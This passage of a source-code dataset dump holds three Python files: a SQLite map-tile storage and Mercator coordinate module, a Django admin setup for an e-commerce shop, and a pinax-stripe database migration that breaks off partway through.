max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
osm_adaptor.py | nooneisperfect/ReadYourMAPFile | 0 | 12797451 | #!/usr/bin/env python
#******************************************************************************
# From $Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $
# VERSION MODIFIED FROM ORIGINAL, come with no warranty
# <NAME>
# input: vrt file (-addalpha) in 3857 projection (projection is forced due
# to weird effect in AutoCreateWarpedVRT)
# 2 bands: 1 grayscale, one alpha mask
import sqlite3
import os
import math
__version__ = "$Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $"
class SqliteTileStorage():
""" Sqlite files methods for simple tile storage"""
def __init__(self, type):
self.type=type
def create(self, filename, overwrite=False):
""" Create a new storage file, overwrite or not if already exists"""
self.filename=filename
CREATEINDEX=True
if overwrite:
if os.path.isfile(self.filename):
os.unlink(self.filename)
else:
if os.path.isfile(self.filename):
CREATEINDEX=False
self.db = sqlite3.connect(self.filename)
cur = self.db.cursor()
cur.execute(
"""
CREATE TABLE IF NOT EXISTS tiles (
x int,
y int,
z int,
s int,
image blob,
PRIMARY KEY(x,y,z,s))
""")
cur.execute(
"""
CREATE TABLE IF NOT EXISTS info (
desc TEXT,
tilenumbering TEXT,
minzoom int,
maxzoom int)
""")
if CREATEINDEX:
cur.execute(
"""
CREATE INDEX IND
ON tiles(x,y,z,s)
""")
cur.execute("insert into info(desc, tilenumbering) values('Simple sqlite tile storage..', (?))", (self.type, ))
self.minzoom = None
self.maxzoom = None
self.written = set()
self.db.commit()
self.pending_images = []
def open(self, filename) :
""" Open an existing file"""
self.filename=filename
if os.path.isfile(self.filename):
self.db = sqlite3.connect(self.filename)
return True
else:
return False
def close(self):
self.commitData(force=True)
cur = self.db.cursor()
cur.execute("UPDATE Info SET minzoom = (?), maxzoom = (?)", (self.minzoom, self.maxzoom))
self.db.commit()
def writeImageFile(self, x, y, z, f) :
""" write a single tile from a file """
self.writeImage(x, y, z, f.read())
def writeImage(self, x, y, z, image) :
""" write a single tile from string """
if (x, y, z) in self.written:
return
self.written.add((x, y, z))
self.pending_images.append((z, x, y, 0, sqlite3.Binary(image)))
if self.minzoom is None or z < self.minzoom:
self.minzoom = z
if self.maxzoom is None or z > self.maxzoom:
self.maxzoom = z
self.commitData()
def commitData(self, force = False):
if len(self.pending_images) > 500 or force:
cur = self.db.cursor()
cur.executemany('insert into tiles (z, x, y,s,image) \
values (?,?,?,?,?)',
self.pending_images)
self.pending_images = []
self.db.commit()
def readImage(self, x, y, z) :
""" read a single tile as string """
cur = self.db.cursor()
cur.execute("select image from tiles where x=? and y=? and z=?", (x, y, z))
res = cur.fetchone()
if res:
image = str(res[0])
return image
else :
print ("None found")
return None
def createFromDirectory(self, filename, basedir, overwrite=False) :
""" Create a new sqlite file from a z/y/x.ext directory structure"""
self.create(filename, overwrite)
for zs in os.listdir(basedir):
zz=int(zs)
for xs in os.listdir(basedir+'/'+zs+'/'):
xx=int(xs)
for ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'):
yy=int(ys.split('.')[0])
print (zz, yy, xx)
z=zz
x=xx
y=yy
print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys)
f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys)
self.writeImageFile(x, y, z, f)
#cur.execute('insert into tiles (z, x, y,image) \
# values (?,?,?,?)',
# (z, x, y, sqlite3.Binary(f.read())))
def createBigPlanetFromTMS(self, targetname, overwrite=False):
""" Create a new sqlite with BigPlanet numbering scheme from a TMS one"""
target=SqliteTileStorage('BigPlanet')
target.create(targetname, overwrite)
cur = self.db.cursor()
cur.execute("select x, y, z from tiles")
res = cur.fetchall()
for (x, y, z) in res:
xx= x
zz= 17 - z
yy= 2**zz - y -1
im=self.readImage(x,y,z)
target.writeImage(xx,yy,zz,im)
def createTMSFromBigPlanet(self, targetname, overwrite=False):
""" Create a new sqlite with TMS numbering scheme from a BigPlanet one"""
target=SqliteTileStorage('TMS')
target.create(targetname, overwrite)
cur = self.db.cursor()
cur.execute("select x, y, z from tiles")
res = cur.fetchall()
for (x, y, z) in res:
xx= x
zz= 17 - z
yy= 2**zz - y -1
im=self.readImage(x,y,z)
target.writeImage(xx,yy,zz,im)
def createTMSFromOSM(self, targetname, overwrite=False):
""" Create a new sqlite with TMS numbering scheme from a OSM/Bing/Googlemaps one"""
target=SqliteTileStorage('TMS')
target.create(targetname, overwrite)
cur = self.db.cursor()
cur.execute("select x, y, z from tiles")
res = cur.fetchall()
for (x, y, z) in res:
xx= x
zz= z
yy= 2**zz - y
im=self.readImage(x,y,z)
target.writeImage(xx,yy,zz,im)
def createOSMFromTMS(self, targetname, overwrite=False):
""" Create a new sqlite with OSM/Bing/Googlemaps numbering scheme from a TMS one"""
target=SqliteTileStorage('OSM')
target.create(targetname, overwrite)
cur = self.db.cursor()
cur.execute("select x, y, z from tiles")
res = cur.fetchall()
for (x, y, z) in res:
xx= x
zz= z
yy= 2**zz - y
im=self.readImage(x,y,z)
target.writeImage(xx,yy,zz,im)
# =============================================================================
# =============================================================================
# =============================================================================
__doc__globalmaptiles = """
globalmaptiles.py
Global Map Tiles as defined in Tile Map Service (TMS) Profiles
==============================================================
Functions necessary for generation of global tiles used on the web.
It contains classes implementing coordinate conversions for:
- GlobalMercator (based on EPSG:900913 = EPSG:3785)
for Google Maps, Yahoo Maps, Microsoft Maps compatible tiles
- GlobalGeodetic (based on EPSG:4326)
for OpenLayers Base Map and Google Earth compatible tiles
More info at:
http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification
http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation
http://msdn.microsoft.com/en-us/library/bb259689.aspx
http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates
Created by <NAME> on 2008-07-03.
Google Summer of Code 2008, project GDAL2Tiles for OSGEO.
In case you use this class in your product, translate it to another language
or find it usefull for your project please let me know.
My email: klokan at klokan dot cz.
I would like to know where it was used.
Class is available under the open-source GDAL license (www.gdal.org).
"""
MAXZOOMLEVEL = 32
class GlobalMercator(object):
"""
TMS Global Mercator Profile
---------------------------
Functions necessary for generation of tiles in Spherical Mercator projection,
EPSG:900913 (EPSG:gOOglE, Google Maps Global Mercator), EPSG:3785, OSGEO:41001.
Such tiles are compatible with Google Maps, Microsoft Virtual Earth, Yahoo Maps,
UK Ordnance Survey OpenSpace API, ...
and you can overlay them on top of base maps of those web mapping applications.
Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).
What coordinate conversions do we need for TMS Global Mercator tiles::
LatLon <-> Meters <-> Pixels <-> Tile
WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid
lat/lon XY in metres XY pixels Z zoom XYZ from TMS
EPSG:4326 EPSG:900913
.----. --------- -- TMS
/ \ <-> | | <-> /----/ <-> Google
\ / | | /--------/ QuadTree
----- --------- /------------/
KML, public WebMapService Web Clients TileMapService
What is the coordinate extent of Earth in EPSG:900913?
[-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244]
Constant 20037508.342789244 comes from the circumference of the Earth in meters,
which is 40 thousand kilometers, the coordinate origin is in the middle of extent.
In fact you can calculate the constant as: 2 * math.pi * 6378137 / 2.0
$ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:900913
Polar areas with abs(latitude) bigger then 85.05112878 are clipped off.
What are zoom level constants (pixels/meter) for pyramid with EPSG:900913?
whole region is on top of pyramid (zoom=0) covered by 256x256 pixels tile,
every lower zoom level resolution is always divided by two
initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062
What is the difference between TMS and Google Maps/QuadTree tile name convention?
The tile raster itself is the same (equal extent, projection, pixel size),
there is just different identification of the same raster tile.
Tiles in TMS are counted from [0,0] in the bottom-left corner, id is XYZ.
Google placed the origin [0,0] to the top-left corner, reference is XYZ.
Microsoft is referencing tiles by a QuadTree name, defined on the website:
http://msdn2.microsoft.com/en-us/library/bb259689.aspx
The lat/lon coordinates are using WGS84 datum, yeh?
Yes, all lat/lon we are mentioning should use WGS84 Geodetic Datum.
Well, the web clients like Google Maps are projecting those coordinates by
Spherical Mercator, so in fact lat/lon coordinates on sphere are treated as if
the were on the WGS84 ellipsoid.
From MSDN documentation:
To simplify the calculations, we use the spherical form of projection, not
the ellipsoidal form. Since the projection is used only for map display,
and not for displaying numeric coordinates, we don't need the extra precision
of an ellipsoidal projection. The spherical projection causes approximately
0.33 percent scale distortion in the Y direction, which is not visually noticable.
How do I create a raster in EPSG:900913 and convert coordinates with PROJ.4?
You can use standard GIS tools like gdalwarp, cs2cs or gdaltransform.
All of the tools supports -t_srs 'epsg:900913'.
For other GIS programs check the exact definition of the projection:
More info at http://spatialreference.org/ref/user/google-projection/
The same projection is degined as EPSG:3785. WKT definition is in the official
EPSG database.
Proj4 Text:
+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0
+k=1.0 +units=m +nadgrids=@null +no_defs
Human readable WKT format of EPGS:900913:
PROJCS["Google Maps Global Mercator",
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0],
UNIT["degree",0.0174532925199433],
AUTHORITY["EPSG","4326"]],
PROJECTION["Mercator_1SP"],
PARAMETER["central_meridian",0],
PARAMETER["scale_factor",1],
PARAMETER["false_easting",0],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]]]
"""
def __init__(self, tileSize=256):
"Initialize the TMS Global Mercator pyramid"
self.tileSize = tileSize
self.initialResolution = 2 * math.pi * 6378137 / self.tileSize
# 156543.03392804062 for tileSize 256 pixels
self.originShift = 2 * math.pi * 6378137 / 2.0
# 20037508.342789244
def LatLonToMeters(self, lat, lon ):
"Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:900913"
mx = lon * self.originShift / 180.0
my = math.log( math.tan((90 + lat) * math.pi / 360.0 )) / (math.pi / 180.0)
my = my * self.originShift / 180.0
return mx, my
def MetersToLatLon(self, mx, my ):
"Converts XY point from Spherical Mercator EPSG:900913 to lat/lon in WGS84 Datum"
lon = (mx / self.originShift) * 180.0
lat = (my / self.originShift) * 180.0
lat = 180 / math.pi * (2 * math.atan( math.exp( lat * math.pi / 180.0)) - math.pi / 2.0)
return lat, lon
def PixelsToMeters(self, px, pyr, zoom):
"Converts pixel coordinates in given zoom level of pyramid to EPSG:900913"
mapSize = self.tileSize << zoom
py = mapSize - pyr
res = self.Resolution( zoom )
mx = px * res - self.originShift
my = py * res - self.originShift
return mx, my
def MetersToPixels(self, mx, my, zoom):
"Converts EPSG:900913 to pyramid pixel coordinates in given zoom level"
res = self.Resolution( zoom )
px = (mx + self.originShift) / res
py = (my + self.originShift) / res
mapSize = self.tileSize << zoom
return px, mapSize - py
def PixelsToTile(self, px, py):
"Returns a tile covering region in given pixel coordinates"
tx = int( math.ceil( px / float(self.tileSize) ) - 1 )
ty = int( math.ceil( py / float(self.tileSize) ) - 1 )
return tx, ty
#def PixelsToRaster(self, px, py, zoom):
# "Move the origin of pixel coordinates to top-left corner"
#
# mapSize = self.tileSize << zoom
# return px, mapSize - py
def MetersToTile(self, mx, my, zoom):
"Returns tile for given mercator coordinates"
px, py = self.MetersToPixels( mx, my, zoom)
return self.PixelsToTile( px, py)
def TileBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in EPSG:900913 coordinates"
minx, miny = self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize, zoom )
maxx, maxy = self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize, zoom )
return ( minx, miny, maxx, maxy )
def TileLatLonBounds(self, tx, ty, zoom ):
"Returns bounds of the given tile in latutude/longitude using WGS84 datum"
bounds = self.TileBounds( tx, ty, zoom)
minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1])
maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3])
return ( minLat, minLon, maxLat, maxLon )
def TileLatLonCorners(self, tx, ty, zoom ):
p1_lat, p1_lon, p3_lat, p3_lon = self.TileLatLonBounds(tx, ty, zoom)
p2_lat, p2_lon, _ , _ = self.TileLatLonBounds(tx+1, ty, zoom)
p4_lat, p4_lon, _, _ = self.TileLatLonBounds(tx, ty-1, zoom)
return (p1_lat, p1_lon, p2_lat, p2_lon, p3_lat, p3_lon, p4_lat, p4_lon)
def Resolution(self, zoom ):
"Resolution (meters/pixel) for given zoom level (measured at Equator)"
# return (2 * math.pi * 6378137) / (self.tileSize * 2**zoom)
return self.initialResolution / (2**zoom)
def ZoomForPixelSize(self, pixelSize ):
"Maximal scaledown zoom of the pyramid closest to the pixelSize."
for i in range(MAXZOOMLEVEL):
if pixelSize > self.Resolution(i):
if i!=0:
return i-1
else:
return 0 # We don't want to scale up
def GoogleTile(self, tx, ty, zoom):
"Converts TMS tile coordinates to Google Tile coordinates"
# coordinate origin is moved from bottom-left to top-left corner of the extent
return tx, (2**zoom - 1) - ty
def QuadTree(self, tx, ty, zoom ):
"Converts TMS tile coordinates to Microsoft QuadTree"
quadKey = ""
ty = (2**zoom - 1) - ty
for i in range(zoom, 0, -1):
digit = 0
mask = 1 << (i-1)
if (tx & mask) != 0:
digit += 1
if (ty & mask) != 0:
digit += 2
quadKey += str(digit)
return quadKey
| 2.484375 | 2 |
src/admin.py | erastusnzula/Django-ecommerce | 0 | 12797452 | from django.contrib import admin
from django.utils.html import format_html
# from django.contrib.auth.models import Group
from .models import Product, CartProduct, Order, Address, Payment, Coupon, Refund, Setting, ProductImages, Profile, \
Contact, Category, Size
# admin.site.unregister(Group)
class ProductImageModel(admin.StackedInline):
model = ProductImages
@admin.register(Product)
class ProductAdmin(admin.ModelAdmin):
list_display = ['name', 'product_image', 'price', 'discount_price', 'slug', 'label']
inlines = [ProductImageModel]
list_per_page = 3
def product_image(self, obj):
return format_html(f'''
<img height='80px' src='{obj.image.url}'/>
''')
def make_refund_accepted(modeladmin, request, queryset):
queryset.update(cancelled=True, refund_requested=False, refund_granted=True)
make_refund_accepted.short_description = 'Update orders to refund granted'
def make_product_received(modeladmin, request, queryset):
queryset.update(received=True)
make_product_received.short_description = 'Update orders to received'
@admin.register(Category)
class CategoryAdmin(admin.ModelAdmin):
pass
@admin.register(Order)
class OrderAdmin(admin.ModelAdmin):
list_display = ['user', 'ordered', 'ordered_date', 'being_delivered', 'cancelled', 'received', 'refund_requested',
'refund_granted',
'billing_address', 'shipping_address', 'payment', 'coupon', 'ip']
list_filter = ['ordered', 'being_delivered', 'received', 'refund_requested', 'refund_granted']
list_display_links = ['user', 'billing_address', 'shipping_address', 'payment', 'coupon']
search_fields = ['user__username', 'ref_code']
actions = [make_refund_accepted, make_product_received]
readonly_fields = ['user', 'ordered', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ref_code',
'products', 'ordered_date']
date_hierarchy = 'ordered_date'
fieldsets = [
('Name', {'fields': ['user', 'ip', 'billing_address', 'shipping_address']}),
('Order Information', {'fields': ['ordered', 'ordered_date', 'payment', 'coupon', 'ref_code']}),
('Ordered Items', {'fields': ['products']}),
('Delivery Status', {'fields': ['being_delivered', 'cancelled', 'received']}),
('Refund', {'fields': ['refund_requested', 'refund_granted']}),
]
@admin.register(CartProduct)
class CartProductAdmin(admin.ModelAdmin):
list_display = ['user', 'product', 'quantity', 'ordered']
readonly_fields = ['user', 'product', 'quantity', 'ordered']
list_per_page = 5
@admin.register(Address)
class AddressAdmin(admin.ModelAdmin):
list_display = ['user', 'date', 'address', 'town', 'country', 'zip', 'address_type', 'default']
list_filter = ['default', 'address_type', 'country']
search_fields = ['user', 'street_address', 'apartment_address', 'zip']
date_hierarchy = 'date'
@admin.register(Payment)
class PaymentAdmin(admin.ModelAdmin):
readonly_fields = ['stripe_charge_id', 'paypal_order_key', 'paypal_user_id', 'user', 'paypal_full_name',
'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code',
'paypal_country_code', 'amount', 'paypal_amount']
list_display = ['user', 'amount', 'timestamp']
list_per_page = 5
date_hierarchy = 'timestamp'
fieldsets = (
('Customer', {'fields': ['user']}),
('Stripe Payment', {'fields': ['stripe_charge_id']}),
('Paypal Payment', {'fields': ['paypal_order_key', 'paypal_user_id', 'paypal_full_name',
'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code',
'paypal_country_code',
'paypal_amount']}),
('Total Amount Paid', {'fields': ['amount']}),
)
@admin.register(Coupon)
class CouponAdmin(admin.ModelAdmin):
pass
def refund_accepted(modeladmin, request, queryset):
queryset.update(accepted=True)
refund_accepted.short_description = 'Update refund to accepted'
@admin.register(Refund)
class RefundAdmin(admin.ModelAdmin):
list_display = ['order', 'ref_code', 'accepted', 'email', 'date_req']
readonly_fields = ['order', 'ref_code', 'accepted', 'email', 'reason']
actions = [refund_accepted]
date_hierarchy = 'date_req'
@admin.register(Setting)
class SettingAdmin(admin.ModelAdmin):
pass
@admin.register(Profile)
class ProfileAdmin(admin.ModelAdmin):
fieldsets = [
('User Profile', {'fields': ['user', 'country', 'phone_number']}),
('Profile Photo', {'fields': ['image']}),
]
readonly_fields = ['user', 'country', 'phone_number', 'image']
@admin.register(Contact)
class ContactAdmin(admin.ModelAdmin):
pass
@admin.register(Size)
class SizeAdmin(admin.ModelAdmin):
pass
admin.site.site_title = "EMU"
admin.site.site_header = "EMU"
admin.site.index_title = "Administration"
| 1.890625 | 2 |
pinax/stripe/migrations/0001_initial.py | bonidjukic/pinax-stripe | 0 | 12797453 | <reponame>bonidjukic/pinax-stripe
# -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-08-06 19:00
from __future__ import unicode_literals
from decimal import Decimal
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import jsonfield.fields
import pinax.stripe.models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Account',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191, unique=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('business_name', models.TextField(blank=True, null=True)),
('business_url', models.TextField(blank=True, null=True)),
('charges_enabled', models.BooleanField(default=False)),
('country', models.CharField(max_length=2)),
('debit_negative_balances', models.BooleanField(default=False)),
('decline_charge_on_avs_failure', models.BooleanField(default=False)),
('decline_charge_on_cvc_failure', models.BooleanField(default=False)),
('default_currency', models.CharField(max_length=3)),
('details_submitted', models.BooleanField(default=False)),
('display_name', models.TextField(blank=True, null=True)),
('email', models.TextField(blank=True, null=True)),
('legal_entity_address_city', models.TextField(blank=True, null=True)),
('legal_entity_address_country', models.TextField(blank=True, null=True)),
('legal_entity_address_line1', models.TextField(blank=True, null=True)),
('legal_entity_address_line2', models.TextField(blank=True, null=True)),
('legal_entity_address_postal_code', models.TextField(blank=True, null=True)),
('legal_entity_address_state', models.TextField(blank=True, null=True)),
('legal_entity_dob', models.DateField(blank=True, null=True)),
('legal_entity_first_name', models.TextField(blank=True, null=True)),
('legal_entity_gender', models.TextField(blank=True, null=True)),
('legal_entity_last_name', models.TextField(blank=True, null=True)),
('legal_entity_maiden_name', models.TextField(blank=True, null=True)),
('legal_entity_personal_id_number_provided', models.BooleanField(default=False)),
('legal_entity_phone_number', models.TextField(blank=True, null=True)),
('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)),
('legal_entity_type', models.TextField(blank=True, null=True)),
('legal_entity_verification_details', models.TextField(blank=True, null=True)),
('legal_entity_verification_details_code', models.TextField(blank=True, null=True)),
('legal_entity_verification_document', models.TextField(blank=True, null=True)),
('legal_entity_verification_status', models.TextField(blank=True, null=True)),
('type', models.TextField(blank=True, null=True)),
('metadata', jsonfield.fields.JSONField(blank=True, null=True)),
('stripe_publishable_key', models.CharField(blank=True, max_length=100, null=True)),
('product_description', models.TextField(blank=True, null=True)),
('statement_descriptor', models.TextField(blank=True, null=True)),
('support_email', models.TextField(blank=True, null=True)),
('support_phone', models.TextField(blank=True, null=True)),
('timezone', models.TextField(blank=True, null=True)),
('tos_acceptance_date', models.DateField(blank=True, null=True)),
('tos_acceptance_ip', models.TextField(blank=True, null=True)),
('tos_acceptance_user_agent', models.TextField(blank=True, null=True)),
('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)),
('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual', 'manual'), ('Daily', 'daily'), ('Weekly', 'weekly'), ('Monthly', 'monthly')], max_length=7, null=True)),
('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)),
('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)),
('payout_statement_descriptor', models.TextField(blank=True, null=True)),
('payouts_enabled', models.BooleanField(default=False)),
('verification_disabled_reason', models.TextField(blank=True, null=True)),
('verification_due_by', models.DateTimeField(blank=True, null=True)),
('verification_timestamp', models.DateTimeField(blank=True, null=True)),
('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)),
('authorized', models.BooleanField(default=True)),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='BankAccount',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191, unique=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('account_holder_name', models.TextField()),
('account_holder_type', models.TextField()),
('bank_name', models.TextField(blank=True, null=True)),
('country', models.TextField()),
('currency', models.TextField()),
('default_for_currency', models.BooleanField(default=False)),
('fingerprint', models.TextField()),
('last4', models.CharField(max_length=4)),
('metadata', jsonfield.fields.JSONField(blank=True, null=True)),
('routing_number', models.TextField()),
('status', models.TextField()),
('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='BitcoinReceiver',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191, unique=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('active', models.BooleanField(default=False)),
('amount', models.DecimalField(decimal_places=2, max_digits=9)),
('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)),
('bitcoin_amount', models.PositiveIntegerField()),
('bitcoin_amount_received', models.PositiveIntegerField(default=0)),
('bitcoin_uri', models.TextField(blank=True)),
('currency', models.CharField(default='usd', max_length=10)),
('description', models.TextField(blank=True)),
('email', models.TextField(blank=True)),
('filled', models.BooleanField(default=False)),
('inbound_address', models.TextField(blank=True)),
('payment', models.TextField(blank=True)),
('refund_address', models.TextField(blank=True)),
('uncaptured_funds', models.BooleanField(default=False)),
('used_for_payment', models.BooleanField(default=False)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Card',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191, unique=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('name', models.TextField(blank=True)),
('address_line_1', models.TextField(blank=True)),
('address_line_1_check', models.CharField(max_length=15)),
('address_line_2', models.TextField(blank=True)),
('address_city', models.TextField(blank=True)),
('address_state', models.TextField(blank=True)),
('address_country', models.TextField(blank=True)),
('address_zip', models.TextField(blank=True)),
('address_zip_check', models.CharField(max_length=15)),
('brand', models.TextField(blank=True)),
('country', models.CharField(blank=True, max_length=2)),
('cvc_check', models.CharField(blank=True, max_length=15)),
('dynamic_last4', models.CharField(blank=True, max_length=4)),
('tokenization_method', models.CharField(blank=True, max_length=15)),
('exp_month', models.IntegerField()),
('exp_year', models.IntegerField()),
('funding', models.CharField(max_length=15)),
('last4', models.CharField(blank=True, max_length=4)),
('fingerprint', models.TextField()),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Charge',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191, unique=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('source', models.CharField(blank=True, max_length=100)),
('currency', models.CharField(default='usd', max_length=10)),
('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),
('amount_refunded', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),
('description', models.TextField(blank=True)),
('paid', models.NullBooleanField()),
('disputed', models.NullBooleanField()),
('refunded', models.NullBooleanField()),
('captured', models.NullBooleanField()),
('receipt_sent', models.BooleanField(default=False)),
('charge_created', models.DateTimeField(blank=True, null=True)),
('available', models.BooleanField(default=False)),
('available_on', models.DateTimeField(blank=True, null=True)),
('fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),
('fee_currency', models.CharField(blank=True, max_length=10, null=True)),
('transfer_group', models.TextField(blank=True, null=True)),
('outcome', jsonfield.fields.JSONField(blank=True, null=True)),
],
options={
'abstract': False,
},
bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model),
),
migrations.CreateModel(
name='Coupon',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191, unique=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('amount_off', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),
('currency', models.CharField(default='usd', max_length=10)),
('duration', models.CharField(default='once', max_length=10)),
('duration_in_months', models.PositiveIntegerField(blank=True, null=True)),
('livemode', models.BooleanField(default=False)),
('max_redemptions', models.PositiveIntegerField(blank=True, null=True)),
('metadata', jsonfield.fields.JSONField(blank=True, null=True)),
('percent_off', models.PositiveIntegerField(blank=True, null=True)),
('redeem_by', models.DateTimeField(blank=True, null=True)),
('times_redeemed', models.PositiveIntegerField(blank=True, null=True)),
('valid', models.BooleanField(default=False)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Customer',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191, unique=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('account_balance', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),
('currency', models.CharField(blank=True, default='usd', max_length=10)),
('delinquent', models.BooleanField(default=False)),
('default_source', models.TextField(blank=True)),
('date_purged', models.DateTimeField(blank=True, editable=False, null=True)),
('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')),
('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Event',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191, unique=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('kind', models.CharField(max_length=250)),
('livemode', models.BooleanField(default=False)),
('webhook_message', jsonfield.fields.JSONField()),
('validated_message', jsonfield.fields.JSONField(blank=True, null=True)),
('valid', models.NullBooleanField()),
('processed', models.BooleanField(default=False)),
('request', models.CharField(blank=True, max_length=100)),
('pending_webhooks', models.PositiveIntegerField(default=0)),
('api_version', models.CharField(blank=True, max_length=100)),
('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')),
('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='EventProcessingException',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('data', models.TextField()),
('message', models.CharField(max_length=500)),
('traceback', models.TextField()),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Invoice',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191, unique=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('amount_due', models.DecimalField(decimal_places=2, max_digits=9)),
('attempted', models.NullBooleanField()),
('attempt_count', models.PositiveIntegerField(blank=True, null=True)),
('statement_descriptor', models.TextField(blank=True)),
('currency', models.CharField(default='usd', max_length=10)),
('closed', models.BooleanField(default=False)),
('description', models.TextField(blank=True)),
('paid', models.BooleanField(default=False)),
('receipt_number', models.TextField(blank=True)),
('period_end', models.DateTimeField()),
('period_start', models.DateTimeField()),
('subtotal', models.DecimalField(decimal_places=2, max_digits=9)),
('tax', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),
('tax_percent', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),
('total', models.DecimalField(decimal_places=2, max_digits=9)),
('date', models.DateTimeField()),
('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)),
('charge', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')),
],
options={
'abstract': False,
},
